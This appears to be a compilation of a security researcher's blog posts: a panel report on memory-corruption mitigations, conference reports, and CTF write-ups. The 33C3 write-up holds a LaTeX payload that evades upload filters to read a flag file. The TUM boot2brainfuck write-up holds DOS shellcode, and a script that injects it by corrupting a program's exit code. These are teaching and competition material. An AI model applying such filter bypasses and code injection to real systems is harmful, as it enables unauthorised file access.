Over the last 15 years we as a community have developed a set of defenses that make successful exploitation much harder, see our Eternal War in Memory paper for a systematization of all these mitigations. With stack cookies, software is protected against continuous buffer overflows, which stops simple stack smashing attacks. About 10 years go, the combination of Address Space Layout Randomization -- ASLR, which shuffles the address space -- and Data Execution Prevention -- DEP, which enforces a separation between code and data -- increased the protection against code reuse attacks. DEP itself protects against code injection but requires ASLR to protect against code reuse attacks. In the last 2 years, Control-Flow Integrity -- CFI, a policy that restricts the runtime control flow to programmer intended targets -- has been deployed in two flavors: coarse-grained through Microsoft’s Control-Flow Guard and fine-grained through Google’s LLVM-CFI. In addition, Intel has proposed a fine-grained shadow stack to protect the backward edge (function returns) and a coarse-grained forward-edge mechanism to protect indirect function calls that will be implemented in hardware. See an earlier blogpost or our survey for a discussion of the different CFI mechanisms.

Memory corruption vulnerabilities over time. Thanks to Victor van der Veen from VU for the data.

We started off the panel with brief mission statements and an introduction of the three panelists: Thomas Dullien, Cristiano Giuffrida, and Michalis Polychronakis. Yours truly served as the humble (and only slightly biased) moderator.

Thomas Dullien from Google started the introduction round. Coming from an academic background but having switched to industry after doing a malware and reverse engineering startup has exposed him to a lot of security practice. He argued that none of the academic proposals (except for CFI) are deployed (ASLR + DEP originated outside academia, although one could argue that stack cookies started in academia and were refined to practicality in industry) and that academia has been optimizing for the wrong metrics. Academics often follow a partial view of attacks and do not consider the full system stack. In addition, attacks may only be partially stopped or a defense protects against a primitive instead of against an attack vector. In his opinion, academics should think about what they want to mitigate and clearly define their attacker models and threat models. Thomas argued for compartmentalization, moving untrusted components into sandboxes and protecting the remaining code with strong mitigations.

Cristiano Giuffrida from VUsec at VU Amsterdam mentioned their research in different mitigations and stressed that they focus on practical defenses. VUsec is known for CFI mitigations for binaries and source code and for novel approaches that target type safety. Focusing on systems research, VUsec is building frameworks for mitigations such as a generic metadata storage system. Going beyond defenses, VUsec is also known for different attacks leveraging combinations of rowhammer to flip bits (i.e., using it as a write primitive) with different side channels (i.e., using it as read primitive) to allow exploitation beyond any attacker model used in current mitigations. Cristiano argued for metrics along multiple dimensions. To effectively compare different mitigations, we need to develop clear metrics along performance (CPU) cost, memory cost, binary compatibility, and functional compatibility.

Michalis Polychronakis from Stony Brook talked about their research on probabilistic defenses. Protecting different domains poses new and interesting challenges. For example, protecting operating system kernels requires knowledge of the underlying data structures and the degrees of freedom are limited as both user-space and kernel-space are designed with certain assumptions. Another point Michalis brought up is compatibility and the need to protect binary-only programs. Binaries are always available and development of binary analysis techniques allows protection of any code. Source code may be more precise initially but deployment will be harder, especially when some components are not available as open-source such as the libc or proprietary libraries. Michalis agreed that compatibility is challenging and that useful defenses will be low (zero) overhead, highly compatible, and mitigate complete attack classes.

After the initial position statements we iterated over several main discussion topics: CFI and it’s research success, sandboxing, composition of mitigations, hardware deployment, reproducibility, metrics, and benchmarks.

The first discussion topic was transfer of academic research to practice at the example of CFI. CFI has been proposed by academics and academia has worked tirelessly for the last 10 years to refine CFI policies. CFI has been adapted to kernel and user-space, for binaries and source code, and all at different levels of granularity and precision. Generally, the performance and memory overhead is low to negligible. In addition to many software implementations, CFI is on the verge of being deployed in hardware through Intel’s CET extensions. The panelists agreed that CFI makes exploitation harder but quantifying this additional hardness is hard and program dependent. CFI is especially not useful in all contexts and academics should not apply CFI everywhere. For example, in browsers a JIT compiler/interpreter allows the attacker to generate new code based on attacker-controlled data. As the JIT compiler, the generated code, and all other code and data are co-located in a single process, simply protecting the existing code is not enough to stop an attacker. Another example are operating system kernels. An attacker achieves her goals by simply flipping bits in important data structures such as the user id in the process struct or pointers in the page table. Even if the control-flow is protected through CFI, data-only attacks are much more severe and direct. Orthogonally, sandboxing individual components and enforcing least privilege will be more effective than simply restricting control flow. All's not lost though, CFI is useful in particular locations and makes code reuse attacks harder. The question academics (and the community) should answer is how much harder an attack becomes.

An orthogonal vector is hardware deployment of mitigations. Intel is targeting a hardware deployment of a strong backward edge but weak forward edge CFI solution. With open source hardware such as RISC-V defense mechanisms with hardware support can realistically be tested by researchers, leveling the playing field between academia and industry.

Sandboxing/least privilege is a simple and well known mitigation technique that restricts a module to a well-defined API, limiting interactions with other code. Compartmentalization (and sandboxing) is likely more effective than many other mitigations proposed by academia. What makes sandboxing hard is the requirement for a redesign of the software. For example, the two main mail servers qmail and sendmail are fundamentally different. While sendmail follows a monolithic design qmail is split into many different components with minimal privileges. To enable clear separation, qmail had to be designed from scratch to enforce this level of separation with minimal privileges for individual components. An interesting question is how to move from monolithic software to individually sandboxed components.

As one mitigation alone is clearly not effective against all possible attack vectors, it becomes clear that a combination of mitigations is required to defend a system. Mitigations may interact at multiple levels and composition of defenses is an unsolved problem. One mitigation may protect against one attack vector but make another attack vector easier. For example randomizing allocators may shuffle different allocation classes. One one hand, this makes overflows into an object of the same class harder but allows overflows into other classes. The interaction between different mitigations may be intricate and we currently do not reason about these interactions. It would be interesting to develop a model that allows such a reasoning.

Benchmark suites, or the lack thereof, is another problematic topic when evaluating mitigations. Many publications are prone to benchmarking crimes. Defenses are evaluated using only a subset of standard benchmarks (e.g., SPEC CPU2006 for performance) where individual benchmarks are cherry picked. Binary-only defenses are often only run with simple binaries such as the binutils or other simple small binaries, often excluding the libc. In general, defenses must be evaluated using the full benchmark suite to enable comparison between different techniques in addition to realistic work loads. For example, for compiler-based defenses at least browsers such as Firefox or Chrome should be evaluated and for binary analysis mechanisms at least Adobe Acrobat Reader and a libc must be evaluated to show that the techniques can cope with the complexity of real systems. Going forward we have to develop benchmarks that evaluate security properties as well, likely for individual attack vectors (Lava is an example of such a framework). This would allow a centralized testing infrastructure for different mechanisms and a quantitative comparison of mechanisms compared to the qualitative arguments that are currently used.

Reproducibility is a big problem in academia. Many defenses are simply published in paper form with some performance evaluation. Reproducing the results of a paper is hard and most of the time impossible. Papers that overclaim their solutions without backing up the results through an open-source mechanism cannot be reproduced and should be considered with a grain of salt. Going forward, we should push the community towards releasing implementation prototypes but under the assumption that these are implementation prototypes and not production mechanisms. One solution could be to release docker containers with the specific software that allows reproducing the results. If required, the software license could be restricted to only allow reproduction of results. This is a fine line, one one hand we want to compare against other mechanisms but on the other hand bugs that are orthogonal to the defense policy should not become a reason to attack an open-sourced defense.

Generally, it is hard to evaluate defense mechanisms resulting in a multi dimensional problem -- especially for system security. System security inherits the evaluation criteria from systems. Systems research requires rigorous evaluation of a prototype implementation along the dimensions of runtime performance and memory overhead. Sometimes complexity of the proposed system is evaluated as well. As defenses are complementary to a system (i.e., they build on top of a system) the additional complexity becomes much more problematic. In addition, we have to come up with metrics to evaluate different threat models and attacks, allowing us to infer how much harder an attack becomes given that a specific defense is used.

Current computers and their systems are hugely complex and only deterministic in abstraction. Many concurrent layers interact with often hard to distinguish effects. Security crosscuts all the layers of our systems from hardware to the highest layer of the software stack. Defenses have to reason along all these layers and the guarantees may be broken at any layer. While we often argue from the top of the stack down (or from a theoretical aspect), we should approach an electrical engineering view down to the lowest level.

When transitioning defenses into practice, researchers are often faced with additional difficulties. Defenses add overhead along several dimensions and increase the complexity of a software system. Researchers therefore need to argue in favor of their system. Attacks on the other hand are purely technical as an exploit proofs that a defense can be bypassed. In short: offense is technical while defense is political. Even shorter: you cannot argue against a root shell.

SyScan+360 in Seattle

2017-05-31T22:15:00-04:00

Just a couple of days after Oakland '17 I attended my next information security conference. This year, SyScan+360 was in Seattle and I used the time between Oakland and SyScan for a nice road trip from San Jose to Seattle. SyScan is not an academic but an industry conference. As I've been to SysCan before (see write-ups for the first and second day), I knew that I could expect a great technical program focused on attacks hosted by the awesome Thomas Lim. SyScan focuses on fewer but higher quality talks and as always, I will focus on my personal highlights.

Matt Miller: Towards Mitigating Arbitrary Native Code Execution in Windows 10

Matt Miller gave a super packed talk about protecting Windows 10 applications against code reuse attacks. As the talk was super packed it was challenging to follow all the details and I really hope that the talk will become available online in the near future. The overall goal of the Windows security team is to kill entire bug classes while following required design practices.

At its core, Windows uses two techniques to prevent arbitrary code generation: code integrity guard which restricts DLLs that can be loaded by checking their signatures and arbitrary code guard which enforces immutable code so that data cannot become code. As a JIT compiler could compromise the guarantees of the arbitrary code guard, EDGE removed the JIT from the main browser process. JavaScript can only generate new machine code through a well-defined interface.

In addition to this baseline, control-flow guard protects against control-flow hijacking with the limitation that backward edges are not protected and valid functions can be called out of context. A design principle of CF Guard is to fail open, i.e., indirect calls to COTS binaries are permitted to enable backward compatibility.

Microsoft's defenses are evaluated according to the following criteria:

Security: a defense must be robust against the threat model.
Performance: the defense must be within reason compared to the value it gives.
Compatibility: a defense must be compatible with existing code.
Interoperability: defenses must interoperate with COTS/binary code.
ABI compliant: rebuilding world is not possible.
Agility: any defense added to the toolset increases complexity. Defenses must be agile enough to enable further and future development.
Developer friction: cost for developers must be minimal, i.e., no code changes are possible.

Matt later talked about return flow guard, an ABI compliant shadow stack that leverages x86_64 segmentation. Unfortunately there were attacks against return flow guard that stopped it from being deployed.

Overall, this was a fun, fast paced, packed talk that explained the considerations industry has to follow when deploying mitigations and defenses. More information is available in a Microsoft blog post and Matt made the slides available as well.

Li Kang: Enhancing Symbolic Fuzzing with Learning

Li explained his project on scaling symbolic fuzzing. Based on a concrete execution he derives information about the execution, collecting constraints along the way. The program runs in phases, for each phase information is parsed and then propagated to the next phase. This data is then used to guide symbolic execution along these starting points. The combination of these techniques allows researchers to scale symbolic execution to larger and more complex programs.

The bag of tricks for further scaling involves selected state scheduling. Heuristics based on concrete program executions allow a better selection of reasonable states and help move symbolic execution past the early stages of the program.

Oleksandr Bazhaniuk, Yuriy Bulygin: Exploring Your System Deeper is Not Naughty

Alex and Yuriy gave an interesting talk about chip security. For chip firmwares, many different functional modules are simply slammed together with different code quality and security constraints. Some of the modules may not even be signed, others contain firmware that is read-writable. A simple module-based analysis may detect bugs in highly privileged code. This whole area is not well explored.

Omri Herscovici, Omer Gull: Pwned in Translation - from Subtitles to RCE

This was by far the most entertaining talk at SyScan this year. Omri and Omer showed a set of remote code execution bugs in different video players and home entertainment systems through subtitle parsing. Surprisingly, there is a large amount of different subtitle formats with different powers. Some of them allow background commands, font embedding, or even image decoding. Overall, they powned PopcornTime, Kodi, StremIO, and VLC. Fun times and very entertaining talk.

Joe FitzPatrick: Nation-State Capabilities, Lone Wolf Budget

Listening to emissions of electric devices leaks information about what they are computing. Tagging and learning the emission patterns allows interesting applications such as tracking locations. Fun hacker talk.

Mathias Payer: Protecting bare-metal smart devices with EPOXY

I presented our work on EPOXY, smart privilege overlays for embedded systems. Bare metal devices are protected through a privilege overlay. Software no longer runs directly at the highest privilege but at user-space privileges. To enable kernel functionality, privileged functions are identified and these instructions are lifted and tagged to execute at kernel privileges. This technique allows us to drop privileges for the majority of code and build higher level security primitives on top of the privilege separation. Slides, source, and paper are available online.

Conclusion

SyScan was again a fun conference and I enjoyed discussions with industry. Due to the location in Seattle a lot of Microsoft folks were around and it was very informative to hear about their constraints. In addition, exchanging ideas in an open hacker environment is always fun.

Oakland'17, the IEEE Symposium on Security and Privacy

2017-05-24T21:12:00-04:00

Every year, the Oakland conference is one of the highlights of security research. As likely the most competitive of the big four conferences, Oakland is always a great place to sync up with friends and learn about new trends in security (then again, being in the PC committees for most other conferences exposes you to trends anyway but the signal to noise ratio is a little lower).

This year there were 582 people registered for the symposium, so Oakland is getting big. For the program, a total of 610 abstracts were submitted that lead to 457 submissions with 419 papers making it to round 0. Of those, 231 survived to round 2, 94 to round 3 and 60 to round 4 for a total acceptance of 60 out of 419 for an acceptance rate of 14.3%.

Either I am getting more social (which is unlikely) or I have just accumulated enough accomplices and peers over the last couple of years so that I spend most of my time in the hallway track, discussing new research directions and possible collaborations with my peers instead of listening to all the talks. Or we just ramble and rant about specific reviewers. In any case, this leads to much fewer talks that I've visited either because I've already read the paper (sometimes a couple of times) or because the topic is not close enough to my interests. Therefore, I only report on some highlights of the conference that left a good impression.

Nicolas Carlini, David Wagner: Towards Evaluating the Robustness of Neural Networks

Machine learning is used in more and more applications and so far no evaluation has looked at the resilience of neural networks in general to adversarial attacks. Given that the attacker knows the model, how resilient is the neural network against adversarial input? Nicolas started his talk with how neural networks vastly improved the classification rate of images, e.g., for text recognition or object recognition. Compared to the existing heuristics, the neural networks vastly outperformed the old approach.

The classification is often used to infer some information about an image. Given that the attacker has access to the classifier (either directly or indirectly by submitting images for classification), she can probe and figure out a minimum amount of changes (minimum according to a predefined metric) to misqualify the image as something else.

In this work, Nicolas developed attack models and techniques to probe neural networks and test heir resilience against attacks. The results were rather surprising as most models degenerated with only few changed pixels. As it turns out, the models learn shallow information to classify images and don't deeply understand the images. The talk showed the limits of these automated classification approaches and won the best student paper award.

Getting security right

Stack Overflow Considered Harmful? The Impact of Copy and Paste on Android Application Security. In this paper, the authors did a large scale study on Android applications, evaluating if code snippets from open sources are used without checking their constraints. The framework first mines a large set of Android applications, recovering the Java code used in these applications. Orthogonally, the framework mines StackOverflow to find code snippets for crypto API usage. These snippets are then labelled as good or bad -- there is a surprising amount of bad or wonky crypto advice on StackOverflow that will make applications more vulnerable. Developers without crypto knowledge cannot know which parameter selection is safe, resulting in buggy applications. Given both datasets (the decompiled applications and the mined crypto API examples), the framework searches for matches. Interestingly there was a large amount of code reuse, including a large amount of bad crypto.

Comparing the Usability of Cryptographic APIs. Along a similar vein, this paper analyzes the usability of different crypto APIs. There are several crypto API that all offer similar communication primitives. The libraries are different in their API. The user study contained a set of easy and hard tasks that each user had to solve with the different APIs. Surprisingly, the simplified APIs were not useful for the more complex tasks as the users did not have enough degrees of freedom to select the correct parameters. The library that allowed complex configuration but had good documentation and a well designed API was used for most correct solutions. As it turns out good documentation, examples, and giving the developers options to select them is better than both just a complex API or a simplified API.

Attacks

How They Did It: An Analysis of Emission Defeat Devices in Modern Automobiles. In this project, folks from RUB and UCSD reverse engineered the firmware of the exhaust system of different cars and inferred how the firmware reacts to different settings, e.g., reducing the engine's power if certain conditions are met. Modern engine controls are highly complex and must react to different situations, detecting the conditions of an ongoing measurement was just one addition to these systems.

The Password MitM Attack. Second factor authorization must be designed carefully to be effective. As a user is registering with a malicious service, the service tells the user that it will have to answer a two factor challenge. At the same time, the service generates a login to a trusted service on behalf of the user. The user then relays the second factor token from the trusted service to the malicious service. If the trusted service does not identify itself (i.e., "your token is 12345") then the user does not know from which service the challenge came. A well designed second factor will send the text messages from the same well known number and identify the service as part of the challenge. Even then, some users will ignore this information and continue to log into the malicious service.

Systems Security and Authentication

Protecting bare-metal smart devices with EPOXY. In our talk we presented Abe's work on protecting bare-metal devices through a privilege overlay. Instead of running all software at the highest privilege level we drop privileges for the majority of code and selectively enable privileges for a few instructions that actually need them (e.g., for IO). Dropping privileges allows us to configure the Memory Protection Unit (MPU) to enforce access restrictions to code and data, enforcing non-executable data and non-writable code. To protect against code reuse and data-only attack we also apply diversity and a safe stack.

Norax: Enabling Execute-Only Memory for COTS Binaries on AArch64. In this project the authors enable execute-only memory for ARM binaries. The anlysis separates code and data into separate pages. Surprisingly, ARM has much more data embedded in code pages compared to x86 which makes this problem harder. The authors propose an approach that disassembles and patches the underlying code and then use a modified loader to update necessary references at runtime. In addition, a runtime monitor handles any missed references and backpatches them.

Software Security

kyfire: Data-Driven Seed Generation for Fuzzing. The authors developed a targeted fuzzer for XML libraries and found a large amount of vulnerabilities in these packages. It is surprising that no targeted fuzzing has been done on XML so far.

VUDDY: A Scalable Approach for Vulnerable Code Clone Discovery. The authors detect vulnerable code in binaries through code matching. They generate fingerprints for specific exploits and use these fingerprints to find vulnerable instances in other libraries. The goal is to identify cloned/forked code that has not been patched after a security vulnerability was detected. An alternate approach is to find stolen code or misused code (e.g., use of open-source code in closed source applications).

Conclusion

Overall, Oakland was a fun conference and this year there were a bunch of interesting system security papers. Next to the few papers I highlighted there were many other interesting sessions that I could not attend. As always, the program is diverse and covers research in information flow, software security, embedded systems, hardware, and crypto. In addition, Oakland serves as a convenient opportunity to sync up with peers at the end of the spring semester and relax after the stressful CCS deadline (which was 2 days before the conference).

AsiaCCS'17 in Abu Dhabi

2017-04-10T10:09:00-04:00

This was my second AsiaCCS. After an interesting experience in China last year, this year's AsiaCCS was in the United Arab Emirates (UAE) in Abu Dhabi. My program for this conference was quite packed. Two of my students had presentations, Daniele Midi's nesCheck work and Scott Carr's selective memory safety work was presented. In addition, I gave an invited talk about Control-Flow Integrity with detailed metrics and measurements that we conducted on a large set of open-source mechanisms. After serving in the program committee, I already knew some of the interesting papers that will be presented and I'll only highlight a few of them here.

Software Guard Extension

Detecting Privileged Side-Channel Attacks in Shielded Execution with Déjà Vu. The paper presents how one can detect AEX (asynchronous enclave exists) through side channels. Whenever the number of AEX raises past a certain threshold, an attack is against the SGX container is taking place. The proposed solution requires a specification of this threshold which may allow the attacker to tune the attack towards but just below this threshold.

SGX-Log: Securing System Logs With SGX. Log files are targets for attackers as the initial states of the attack may be shown in those log files and they could be used for forensic purposes. To protect log files from attackers, this project moves them into an SGX enclave. The SGX container provides confidentiality and integrity, protecting the log files against tampering. Enclaves may be deleted if the attacker gains access on the machine. The solution therefore does not protect against deleting log files but focuses on tamper resistance. The enclave can therefore serve as a trusted third party without the need to send the log data over the network.

The Circle Game: Scalable Private Membership Test Using Trusted Hardware. SGX is used for a local secure set test. Consumers send hashes to the cloud and the cloud then checks for matches (e.g., for malware), making sure that no information leaks about the hashes sent as input.

Memory safety

Strict Virtual Call Integrity Checking for C++ Binaries. This paper is very similar to the NDSS MARX paper, extending the analysis with some form of CFI. The binary analysis reverse engineers C++ binaries and recovers indirect call sites and class hierarchies. After recovering this information, the indirect dispatches in the binary are protected through a type-based lookup similar to VTrust but for binaries. The results are great: precision is high and overhead is low. This work has been developed concurrently to MARX.

Our papers

Memory Safety for Embedded Devices with nesCheck. nesCheck is a compiler-based approach that enforces a CCured-style type system on top of C source code for embedded systems. Based on a compiler-based analysis, pointers are classified as safe (no pointer arithmetic), sequence (only iteration, e.g., ++ or --), and dynamic (arbitrary pointer arithmetic. Pointers classified as safe do not need any instrumentation. For sequence and dynamic pointers our compiler pass adds corresponding instrumentation to protect any accesses. Main differences to CCured are the port to embedded systems and using a modern compiler that allows fine-grained optimizations. See the paper for details.

DataShield: Configurable Data Confidentiality and Integrity. DataShield allows the programmer to specify what data of a program is sensitive. Based on annotations these sensitive types are protected against memory safety vulnerabilities, enforcing integrity and confidentiality. All classic data cannot interfere with the protected data. To support such a system, all data (heap, globals, and stack) has to be split into safe and unsafe data. The runtime layout of a DataShield process is separated into safe and classic views with no interaction between classic and safe. Two case studies protect an SSL library and the SPEC benchmarks.

Conclusion

Visiting the UAE was interesting and I had time to explore both Dubai and Abu Dhabi. The NYU campus in Abu Dhabi is a modern, open campus and the conference was well organized. The memory safety and embedded sessions were very interesting as were the extensive social events which included dinners and a city tour.

33C3 CTF: Fun times

2016-12-30T15:39:00-05:00

pdfmaker (75 points)

The first challenge I tried was pdfmaker. Surprisingly I spent way too much time on this simple starter challenge. I initially planned to use this challenge as a warm up but ended spending about 10 hours on it, mostly due to me overlooking simpler solutions that are obvious in hindsight. On the route to this challenge I learned a lot about TeX and LaTeX that I honestly would not have needed to know and even started asking questions on Stack Overflow.

The pdfmaker service allows you to upload tex files, sty files, and a bunch of other types of files and to compile tex files. The service also allows you to view generated log files. Interestingly, when uploading files the text is filtered and lines containing .., /, or \x are removed. The removal of the first two types of lines is obvious as the flag is available in ../../flag but the last one took me longer to figure out. So the challenge is to write a LaTeX program that opens the flag and prints it to the log file. What makes the challenge harder is that the LaTeX installation does not have any auxiliary packages available, so the LaTeX document has to be self sufficient.

Overcoming the .. restriction is easy as two . can easily be concatenated. Overcoming the / restriction was much much much harder. I soon figured that the log file contains 2015/Debian in the first line which contains a / character that we could use. The next question is how to access a substring or character inside a string through LaTeX which is surprisingly hard and took me way too long to figure out. I assumed that we cannot use libraries but what I forgot was that we can upload libraries. (This sounds simple but was an amazing aha moment for me after spending such a long time on this challenge.)

First, we upload a simple tex file first.tex and compile it to generate a log file create tex first:

\documentclass{minimal}
\begin{document}
\end{document}
\q

Then we compile it compile first and upload a second tex file create tex second:

\documentclass{minimal}
\usepackage{ystring}
\def\b{.}
\def\y{.}
\def\z{flag}
\newread\file
\immediate\openin\file=first.log
\immediate\read\file to\fileline
\immediate\message{HERE}
\StrMid{\fileline}{62}{62}[\c]
\immediate\message{\c}
\immediate\message{END}
\immediate\closein\file
\immediate\openin\file=\b\b\c\b\b\c\z
\loop\unless\ifeof\file
    \read\file to\fileline
    \message{\fileline}
\repeat
\closein\file
\begin{document}
\end{document}

This LaTeX file opens the first.log log file and uses the ystring library to extract the 62nd character, concatenates the individual components to open the flag and print it to the log file. Now, to use the ystring library we need to upload it. We start by copying xstring.sty and xstring.tex to local files and replace all occurrences of xs with ys to overcome the last filter restriction and then upload these two files as well. After compiling compile second we can access the log file and get the flag. The log file can then be displayed through show log second and we get the flag: 33C3_pdflatex_1s_t0t4lly_s3cur3!

Note that I've also went through the trouble to get a stack exchange account and asked my LaTeX question there.

exfil (100 points)

Exfil was a fun forensics challenge that asked us to extract data from a pcap. The pcap file contains a remote shell session of an attacker that is obfuscated through an UDP/DNS channel that includes a lot of redundancy. Thankfully we received the server along with the challenge which made decoding much easier. I wrote a Python-based decode that dumps both the server side stream and the client side stream to files. The client side stream allowed me to extract a private key and the server side stream allowed me to dump server.docx.gpg which could then be decoded with the extracted private key:

#!/usr/bin/env python
from dnslib import *
import dpkt
import base64

domain = 'eat-sleep-pwn-repeat.de'

def decode_b32(s):
    s = s.upper()
    for i in range(10):
        try:
            return base64.b32decode(s)
        except:
            s += b'='
    raise ValueError('Invalid base32')

def parse_name(label):
    return decode_b32(b''.join(label.label[:-domain.count('.')-1]))

def parse_nameH(label):
    label = label[:-len(domain)-2]
    label = label.translate(None, '.')
    return decode_b32(label)

sseq = 0
sack = 0
cdata = b''
sdata = b''

f = open('dump.pcap')
pcap = dpkt.pcap.Reader(f)
for ts, buf in pcap:
    #print(ts, len(buf))
    eth = dpkt.ethernet.Ethernet(buf)
    ip = eth.data
    udp = ip.data
    #dns = dpkt.dns.DNS(udp.data)
    #for qname in dns.qd:
    #    print binascii.hexlify(parse_name(qname.name))
    query = DNSRecord.parse(udp.data)
    packet = parse_name(query.q.qname)
    conn_id, seq, ack = struct.unpack('<HHH', packet[:6])
    data = packet[6:]
    #print data
    if seq == sack:
        #print('s %d %d %d\n' % (conn_id, seq, ack))
        sdata += data
        #print data
        sack += len(data)
    for x in query.rr:
        pack2 = parse_nameH(str(x.rdata))
        conn_id2, seq2, ack2 = struct.unpack('<HHH', pack2[:6])
        data2 = pack2[6:]
        if seq2 > sseq:
            cdata += data2
            print data2
            sseq = seq2
        if seq2 == sseq and len(cdata) < sseq:
            cdata += data2
        print('x %d %d %d %d %d\n' % (conn_id2, seq2, ack2, sack, sseq))

        #if ack2 > sseq:
        #    forget = ack2 - sseq
        #    #cdata += data2
        #    sseq += forget
        #    #print('c %d %d %d\n' % (conn_id2, seq2, ack2))
    #print(udp.data[13:udp.data.index('eat')-1])
    #x = decode_b32(udp.data[13:udp.data.index('eat')-1])
    #print(str(x))

print "sdata"
print sdata
print "cdata"
print cdata

secret = sdata[sdata.index('START_OF_FILE')+13:sdata.index('END_OF_FILE')]
with open('secret.docx.gpg', 'w') as f:
    f.write(secret)
    f.close()

Running the decryption gpg --decrypt secret.docx.gpg > secret.docx then yields the flag 3C3_g00d_d1s3ct1on_sk1llz_h0mie.

0x90 (150 points)

The 0x90 challenge was a fun blast from the past where we connected to a Slackware 1.01 instance from the early 90ies that had a vulnerable version of lpr with a known privilege escalation. So we could simply google for it and just reuse the exploit.

Uploading the exploit is fun due to the weird remote connection not pasting escape characters correctly. But I somehow managed to open vi, go into edit mode, paste the C file, compile it through gcc exp.c and run it. The flag can then be accessed through cat /flag.txt and yields 33C3_Th3_0x90s_w3r3_pre3tty_4w3s0m3.

Misc

Overall, this was a fun CTF but I spent way too much time on the pdfmaker. I've also looked at the someeta1 challenge which looked like fun but did not have enough time to decode all the templated until the CTF was over.

TUM CTF: boot2brainfuck

2016-10-02T12:39:00-04:00

According to the description, hxp provides us with a brainfuck (BF) execution service where we can send BF programs over netcat and execute them. To help, they provide us with a script that translated BF programs into a DOS, 16-bit COM executable.

Now as a reminder, DOS COM executables are adjusted by 0x100 bytes (starting therefore at address 0x100) and contain up to 64k (0xFFFF) bytes of raw code and data. Programs are restricted to 64kb of RAM and code, luckily there are no protections whatsoever. In addition, we were able to use the good old DOS 0x21 interrupt and the 0x13 BIOS interrupt to request functionalities from the system. We were also told that the flag was at A:FLAG.TXT.

Looking at the bf "compiler", we notice that it's a simple pattern-matching compiler that emits a prefix to set up the environment, translates all BF instructions using simple patterns (where we also learn about some of the DOS interrupts, confirming the suspicion that we'll run in a DOS VM), and an epilogue that uses a DOS interrupt to exit the program, followed by 30kb of 0 bytes used as BF storage.

As a reminder on how BF works, refer to the BF wiki page, or our printbf interpreter for format strings. So having worked with BF quite a bit before, this challenge was right down my alley.

As a first step, I started writing shellcode to use DOS interrupts to open, read, and print the flag file. This turned out to be harder than expected as NASM was making it very difficult to write 16-bit code. Also, there are way more restrictions on registers than I'm actually used to. After some tweaking I used existing shellcode techniques to locate pointers and fixed together a couple of DOS system calls to open and read in the file:

bits 16
org 0x100

; set up ptrs
call past
db "A:\FLAG.TXT",0
past:
pop dx

; open file handle
mov ah, 3Dh ; open file
mov al, 0h  ; 0 read file
; dx contains ptr to filename
;mov dx, file
int 21h

; read A:\FLAG.TXT
mov bx, ax ; handle we get when opening a file
mov ah, 3Fh ; read file
mov cx, 20 ; number of bytes to read
; dx contains pointer to buffer
int 21h

; let's try to use the fancy print
;pop dx
;push dx
; dx contains pointer to buffer
;mov dx, file
mov cx, ax ; len to print
mov bx, 1 ; stdout
mov ah, 40h ; write file/device
int 21h

mov ah, 0x4c
int 21h            ; exit

As you can see when reading the file, I finally fixed it to 20 bytes. When developing the shellcode I used 255 bytes which lead me down a nasty sad detour. More on this later.

Piping the shellcode through NASM nasm -f bin -o print.com dosprint.asm we get a DOS COM executable that we can test using dosemu. Now that we are happy with the shellcode, we turn it into a BF program.

First off, we need to make sure that the epilogue (mov ah,0x4C; int 0x21) of the compiled BF program does not trigger. Luckily, the data area starts right after the code area and we can just decrement the BF data pointer into the code. To keep it simple, we decrement the data pointer twice to pint to the two byte int 0x21 instruction (0xCD21) and we decrement the 0xCD value to 0xB4 so that it turns into a mov bx, 0x21 instruction, rendering the epilogue useless. After incrementing the data pointer twice we can now simply transcode our DOS program into the BF data memory. Having ensured that the exit does not trigger, we slide into the data memory and start executing the values we place there. Due to 30kb data memory, we are restricted to roughly 34kb if BF program, which leaves us roughly 10-15k BF instructions as they are encoded to 1 or 3 bytes for increment/decrement of the data pointer and the data values.

My translator looks as follows:

import sys

f = open("print.com", "rb")
try:
  sys.stdout.write("<<")
  for i in range(0xcd - 0xb4):
      sys.stdout.write("-")
  sys.stdout.write(">>")
  byte = f.read(1)
  while byte != "":
      if (256 - ord(byte)) < ord(byte):
          for i in range(256 - ord(byte)):
              sys.stdout.write("-")
      else:
          for i in range(ord(byte)):
              sys.stdout.write("+")
      sys.stdout.write(">")
      byte = f.read(1)
finally:
  f.close()

This translates our DOS COM into a BF program that we can pass to the BF executor service. Now testing this in vivo did not lead to the expected results and my exploit did not work. For quite a long time I wondered what was happening (and fixing some bugs in the process). After a while I tested with shorter read sequences than 255 (wondering that if the read request was larger than the file it would fail) and if I requested less than 28 bytes from the file, the read actually succeeded and I received parts of the file.

So after some more tinkering I read the flag in 4 steps, reading 20 bytes each time [*] (adjusting my DOS print program accordingly) and concatenating the result into the hxp{ju57 l1k3 4 7ur1n6 m4ch1n3 bu7 w17h l1m173d 5p4c3} flag, resulting in 165 points for team b01lers. I must say that this was a very interesting challenge and a trip back to DOS assembler that I had long forgotten. And, regarding the failed read, I still wonder what I screwed up there.

[*]

Turns out the 28 byte restriction were due to a bug in my code. During testing, I moved the string for the filename from the end to the top of the code. When reading, I reused the buffer for the filename, overwriting my code towards the end. If I read more than 28 bytes, the code after the read was overwritten. Moving the filename back to the end fixes this issue and allows me to read the flag in one read system call.Debugging is hard if you don't have a debugger or any feedback and it's 2am in the morning. (HT @kkotowicz)

AMD SEV attack surface: a tale of too much trust

2016-09-22T12:28:00-04:00

AMD recently announced the new Secure Encrypted Virtualization (SEV) extension that intends to protect virtual machines against compromised hypervisors/Virtual Machine Monitors (VMMs). An intended use-case of SEV is to protect a VM against a malicious cloud provider. All memory contents are encrypted and the cloud provider cannot recover any of the data inside. The root of trust lies with AMD and they control all access to the keys.

SEV is a rather new feature and so far, I only came across the announcement of the patch [2] and a presentation at a recent KVM forum [1]. The goal of this blog post is to compare the two new technologies AMD SEV [1] and Intel SGX [4] and relate it to the Overshadow [5] research paper.

What Overshadow showed is that it is surprisingly difficult to protect a lower privileged component from a higher privileged component without significantly redesigning the lower privileged component. The lower privileged component (the VM) so far trusted the VMM, now if the VMM is removed from the trusted computing base, any part of the VM that interacts with the VMM must be vetted and protected against nasty attacks like corrupted data or time-of-check-to-time-of-use attacks. This then likely allows an attacker to initiate a ROP/JOP attack or even inject code with knowledge of writable/executable regions. This allows the adversary to simply extract data using the existing I/O channels or spawn a remote shell. But more on that in the security discussion.

Overshadow

Overshadow [5] removes the OS from the trusted computing base, protecting application data against compromise from a malicious (or corrupted) OS. Overshadow does not rely on special hardware and is implemented at the VM level. There are several other trust separation mechanisms but Overshadow was the first to remove trust from a large OS kernel while keeping most of the functionality of the OS.

